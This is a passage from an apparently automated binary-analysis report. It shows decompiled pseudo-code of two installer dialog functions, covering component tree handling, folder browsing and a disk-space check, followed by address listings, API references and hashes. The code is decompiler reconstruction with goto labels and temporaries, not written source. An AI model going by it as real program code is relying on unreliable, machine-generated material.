				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42ec39 & 0x00000002;
							if(( *0x42ec39 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404782(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42ec38; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42a07c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42a094;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42a07c = _t315;
									 *0x42a094 = _t315;
									 *0x42ec80 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42ec39 & 0x00000001;
										if(( *0x42ec39 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42ec4c - _t315; // 0x4
										_v32 =  *0x42a094;
										_t196 =  *0x42ec48; // 0x5f5ecc
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e3fc; // 0x5fd5fe
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040473D(0x3ff, 0xfffffffb, E00404755(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x5f5ed4
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x5f5ee4
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42ec4c; // 0x4
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42a094);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ec80 = _a4;
					_t247 =  *0x42ec4c; // 0x4
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a094 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
					 *0x42a088 =  *0x42a088 | 0xffffffff;
					_v24 = _t250;
					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a07c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E83(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E83(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42ec4c - _t318; // 0x4
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a094 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a094 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42ec4c; // 0x4
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403EB8(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403EB8(_v12);
								L89:
								return E00403EEA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                            0x00404820
                                            0x00404826
                                            0x00404828
                                            0x0040482e
                                            0x00404834
                                            0x00404837
                                            0x00404841
                                            0x0040484a
                                            0x0040484d
                                            0x00404850
                                            0x00404a78
                                            0x00404a78
                                            0x00404a7f
                                            0x00404a93
                                            0x00404a81
                                            0x00404a83
                                            0x00404a86
                                            0x00404a87
                                            0x00404a8e
                                            0x00404a8e
                                            0x00404a96
                                            0x00404a9f
                                            0x00404aaa
                                            0x00404aaa
                                            0x00404aad
                                            0x00404ab0
                                            0x00404abf
                                            0x00404abf
                                            0x00404ac6
                                            0x00404b3e
                                            0x00404b3e
                                            0x00404b41
                                            0x00404b43
                                            0x00404b46
                                            0x00404b4d
                                            0x00404b5b
                                            0x00404b5b
                                            0x00404b5d
                                            0x00404b60
                                            0x00404b67
                                            0x00404b69
                                            0x00404b6d
                                            0x00404b8a
                                            0x00404b8e
                                            0x00404b8e
                                            0x00404b6f
                                            0x00404b7c
                                            0x00404b7c
                                            0x00404b6d
                                            0x00404b67
                                            0x00000000
                                            0x00404b41
                                            0x00404ac8
                                            0x00404acb
                                            0x00404ad6
                                            0x00404ad8
                                            0x00404adb
                                            0x00404ae2
                                            0x00404ae7
                                            0x00404ae9
                                            0x00404af3
                                            0x00404af3
                                            0x00404af7
                                            0x00404af9
                                            0x00404afc
                                            0x00404afe
                                            0x00404b01
                                            0x00404b17
                                            0x00404b17
                                            0x00404b03
                                            0x00404b03
                                            0x00404b09
                                            0x00404b0b
                                            0x00404b12
                                            0x00404b0d
                                            0x00404b0d
                                            0x00404b0d
                                            0x00404b0b
                                            0x00404b1b
                                            0x00404b1d
                                            0x00404b22
                                            0x00404b2b
                                            0x00404b2c
                                            0x00404b36
                                            0x00404b36
                                            0x00404b38
                                            0x00404b3b
                                            0x00404b3b
                                            0x00404afc
                                            0x00000000
                                            0x00404ae9
                                            0x00404acd
                                            0x00404ad0
                                            0x00404ad4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404ad4
                                            0x00404ab2
                                            0x00404ab9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404aa1
                                            0x00404aa1
                                            0x00404aa4
                                            0x00404b91
                                            0x00404b91
                                            0x00404b98
                                            0x00404c0c
                                            0x00404c0c
                                            0x00404c13
                                            0x00404c1f
                                            0x00404c1f
                                            0x00404c21
                                            0x00404c28
                                            0x00404c2a
                                            0x00404c2f
                                            0x00404c31
                                            0x00404c34
                                            0x00404c34
                                            0x00404c3a
                                            0x00404c3f
                                            0x00404c41
                                            0x00404c44
                                            0x00404c44
                                            0x00404c4a
                                            0x00404c50
                                            0x00404c56
                                            0x00404c56
                                            0x00404c5c
                                            0x00404c63
                                            0x00404db0
                                            0x00404db0
                                            0x00404db7
                                            0x00404db9
                                            0x00404dc0
                                            0x00404dc4
                                            0x00404dd1
                                            0x00404dd1
                                            0x00404dd4
                                            0x00404dda
                                            0x00404dec
                                            0x00404dec
                                            0x00404dc0
                                            0x00000000
                                            0x00404c69
                                            0x00404c6b
                                            0x00404c70
                                            0x00404c73
                                            0x00404c77
                                            0x00404c77
                                            0x00404c7c
                                            0x00404c7f
                                            0x00404cc0
                                            0x00404cc2
                                            0x00404ccc
                                            0x00404cd2
                                            0x00404cd5
                                            0x00404cda
                                            0x00404ce1
                                            0x00404ce4
                                            0x00404d86
                                            0x00404d8c
                                            0x00404d92
                                            0x00404d97
                                            0x00404d9a
                                            0x00404dab
                                            0x00404dab
                                            0x00000000
                                            0x00404cea
                                            0x00404cea
                                            0x00404cea
                                            0x00404ced
                                            0x00404cf3
                                            0x00404cf6
                                            0x00404cf8
                                            0x00404cfa
                                            0x00404cfc
                                            0x00404cff
                                            0x00404d02
                                            0x00404d09
                                            0x00404d0b
                                            0x00404d0e
                                            0x00404d15
                                            0x00404d18
                                            0x00404d18
                                            0x00404d18
                                            0x00404d18
                                            0x00404d1c
                                            0x00404d1f
                                            0x00404d2b
                                            0x00404d2c
                                            0x00404d2f
                                            0x00404d31
                                            0x00404d31
                                            0x00404d31
                                            0x00404d21
                                            0x00404d23
                                            0x00404d23
                                            0x00404d50
                                            0x00404d50
                                            0x00404d51
                                            0x00404d5d
                                            0x00404d6c
                                            0x00404d6c
                                            0x00404d6e
                                            0x00404d71
                                            0x00404d7a
                                            0x00404d7a
                                            0x00000000
                                            0x00404ced
                                            0x00404c81
                                            0x00404c8c
                                            0x00404c8f
                                            0x00404c94
                                            0x00404c96
                                            0x00404c98
                                            0x00404c9a
                                            0x00404caa
                                            0x00404cb4
                                            0x00404cb6
                                            0x00404cb9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404c9c
                                            0x00404c9c
                                            0x00404c9c
                                            0x00404c9f
                                            0x00404ca2
                                            0x00404ca4
                                            0x00404ca4
                                            0x00404ca4
                                            0x00404ca5
                                            0x00404ca6
                                            0x00404ca6
                                            0x00000000
                                            0x00404c9c
                                            0x00404c7f
                                            0x00404c63
                                            0x00404b9a
                                            0x00404ba0
                                            0x00000000
                                            0x00000000
                                            0x00404bac
                                            0x00404bb0
                                            0x00000000
                                            0x00000000
                                            0x00404bc0
                                            0x00404bc2
                                            0x00404bc5
                                            0x00000000
                                            0x00000000
                                            0x00404bd7
                                            0x00404bd9
                                            0x00404bdc
                                            0x00404be6
                                            0x00404be8
                                            0x00404be9
                                            0x00404bea
                                            0x00404bf9
                                            0x00404bfb
                                            0x00404c02
                                            0x00404c05
                                            0x00000000
                                            0x00404c05
                                            0x00404bde
                                            0x00404be1
                                            0x00404be4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404be4
                                            0x00000000
                                            0x00404aa4
                                            0x00404856
                                            0x0040485b
                                            0x00404860
                                            0x00404865
                                            0x00404866
                                            0x0040486f
                                            0x0040487a
                                            0x00404885
                                            0x0040488b
                                            0x00404899
                                            0x004048ae
                                            0x004048b3
                                            0x004048be
                                            0x004048c7
                                            0x004048dc
                                            0x004048ed
                                            0x004048fa
                                            0x004048fa
                                            0x004048ff
                                            0x00404905
                                            0x00404907
                                            0x0040490a
                                            0x0040490f
                                            0x00404914
                                            0x00404916
                                            0x00404916
                                            0x00404936
                                            0x00404936
                                            0x00404938
                                            0x00404939
                                            0x0040493e
                                            0x00404941
                                            0x00404944
                                            0x00404948
                                            0x0040494d
                                            0x00404952
                                            0x00404956
                                            0x0040495b
                                            0x00404960
                                            0x00404962
                                            0x00404964
                                            0x0040496a
                                            0x00404a34
                                            0x00404a47
                                            0x00000000
                                            0x00404970
                                            0x00404973
                                            0x00404976
                                            0x00404979
                                            0x00404979
                                            0x0040497f
                                            0x00404985
                                            0x00404988
                                            0x0040498e
                                            0x0040498f
                                            0x00404994
                                            0x0040499d
                                            0x004049a4
                                            0x004049a7
                                            0x004049aa
                                            0x004049ad
                                            0x004049e7
                                            0x004049e9
                                            0x00404a12
                                            0x004049eb
                                            0x004049f8
                                            0x004049f8
                                            0x004049af
                                            0x004049b2
                                            0x004049c1
                                            0x004049cb
                                            0x004049d3
                                            0x004049da
                                            0x004049e2
                                            0x004049e2
                                            0x004049ad
                                            0x00404a18
                                            0x00404a19
                                            0x00404a1f
                                            0x00404a25
                                            0x00404a25
                                            0x00404a32
                                            0x00404a4d
                                            0x00404a51
                                            0x00404a6e
                                            0x00404a73
                                            0x00404a76
                                            0x00404a76
                                            0x00000000
                                            0x00404a53
                                            0x00404a58
                                            0x00404a61
                                            0x00404dee
                                            0x00404e00
                                            0x00404e00
                                            0x00404a51
                                            0x00000000
                                            0x00404a32
                                            0x0040496a

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $ ]_$M$N
                                            • API String ID: 1638840714-3954453445
                                            • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                            • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
                                            • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                            • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004042C1, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 273stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x429870;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040546C(0x3fb, _t146);
					E00405E29(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040546C(0x3fb, _t146);
							if(E0040579B(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405BC7(0x429068, _t146);
							_t87 = E00405F57(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405BC7(0x429068, _t146);
								_t89 = E0040574E(0x429068);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429068) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405701(0x429068) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429068) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404755(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42e3fc; // 0x5fd5fe
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040473D(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429058);
									} else {
										E00404678(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42ecc4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403EA5(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a08c == _t158) {
									E00404256();
								}
								 *0x42a08c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a0a0;
							_v60 = E00404612;
							_v56 = _t146;
							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004056BA(_t146);
								_t124 =  *0x42ec30; // 0x5f5d20
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
										lstrcatA(_t146, 0x42dbc0);
									}
								}
								 *0x42a08c =  *0x42a08c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
						E004056BA(_t146);
					}
					 *0x42e3f8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E83(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E83(_t166);
					E00403EB8(_t165);
					_t138 = E00405F57(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EEA(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                            0x004042c1
                                            0x004042c7
                                            0x004042cd
                                            0x004042da
                                            0x004042e8
                                            0x004042eb
                                            0x004042f3
                                            0x004042f9
                                            0x004042f9
                                            0x00404305
                                            0x00404308
                                            0x00404376
                                            0x0040437d
                                            0x00404454
                                            0x0040445b
                                            0x0040446a
                                            0x0040446a
                                            0x0040446e
                                            0x00404478
                                            0x00404485
                                            0x00404487
                                            0x00404487
                                            0x00404495
                                            0x0040449c
                                            0x004044a3
                                            0x004044a6
                                            0x004044dd
                                            0x004044df
                                            0x004044e5
                                            0x004044ea
                                            0x004044ee
                                            0x004044f0
                                            0x004044f0
                                            0x0040450c
                                            0x00000000
                                            0x0040450e
                                            0x00404511
                                            0x0040451f
                                            0x00404525
                                            0x00404526
                                            0x00404529
                                            0x0040452c
                                            0x00000000
                                            0x0040452c
                                            0x004044a8
                                            0x004044aa
                                            0x004044ae
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004044b0
                                            0x004044b0
                                            0x004044bd
                                            0x004044c2
                                            0x00000000
                                            0x00000000
                                            0x004044c6
                                            0x004044c8
                                            0x004044c8
                                            0x004044d3
                                            0x004044d6
                                            0x004044db
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004044db
                                            0x00404538
                                            0x00404542
                                            0x00404545
                                            0x00404548
                                            0x0040454f
                                            0x0040454f
                                            0x00404551
                                            0x00404551
                                            0x00404556
                                            0x00404558
                                            0x00404560
                                            0x00404567
                                            0x00404569
                                            0x00404574
                                            0x00404574
                                            0x00404569
                                            0x0040457b
                                            0x00404584
                                            0x0040458e
                                            0x00404596
                                            0x004045b1
                                            0x00404598
                                            0x004045a1
                                            0x004045a1
                                            0x00404596
                                            0x004045b6
                                            0x004045bb
                                            0x004045c0
                                            0x004045c9
                                            0x004045c9
                                            0x004045d2
                                            0x004045d4
                                            0x004045d4
                                            0x004045e0
                                            0x004045e8
                                            0x004045f2
                                            0x004045f2
                                            0x004045f7
                                            0x00000000
                                            0x004045f7
                                            0x004044a6
                                            0x0040445d
                                            0x00404464
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404464
                                            0x00404383
                                            0x0040438c
                                            0x004043a6
                                            0x004043ab
                                            0x004043b5
                                            0x004043bc
                                            0x004043c8
                                            0x004043cb
                                            0x004043ce
                                            0x004043d5
                                            0x004043dd
                                            0x004043e0
                                            0x004043e4
                                            0x004043eb
                                            0x004043f3
                                            0x0040444d
                                            0x004043f5
                                            0x004043f6
                                            0x004043fd
                                            0x00404402
                                            0x00404407
                                            0x0040440f
                                            0x0040441c
                                            0x00404430
                                            0x00404434
                                            0x00404434
                                            0x00404430
                                            0x00404439
                                            0x00404446
                                            0x00404446
                                            0x004043f3
                                            0x00000000
                                            0x004043ab
                                            0x00404399
                                            0x00000000
                                            0x00000000
                                            0x0040439f
                                            0x00000000
                                            0x0040430a
                                            0x00404317
                                            0x00404320
                                            0x0040432d
                                            0x0040432d
                                            0x00404334
                                            0x0040433a
                                            0x00404343
                                            0x00404346
                                            0x00404349
                                            0x00404351
                                            0x00404354
                                            0x00404357
                                            0x0040435d
                                            0x00404364
                                            0x0040436b
                                            0x004045fd
                                            0x0040460f
                                            0x00404371
                                            0x00404374
                                            0x00000000
                                            0x00404374
                                            0x0040436b

                                            APIs
                                            • GetDlgItem.USER32 ref: 00404310
                                            • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                                            • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                                            • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                                            • lstrcmpiA.KERNEL32(TclpOwkq,0042A0A0,00000000,?,?), ref: 00404428
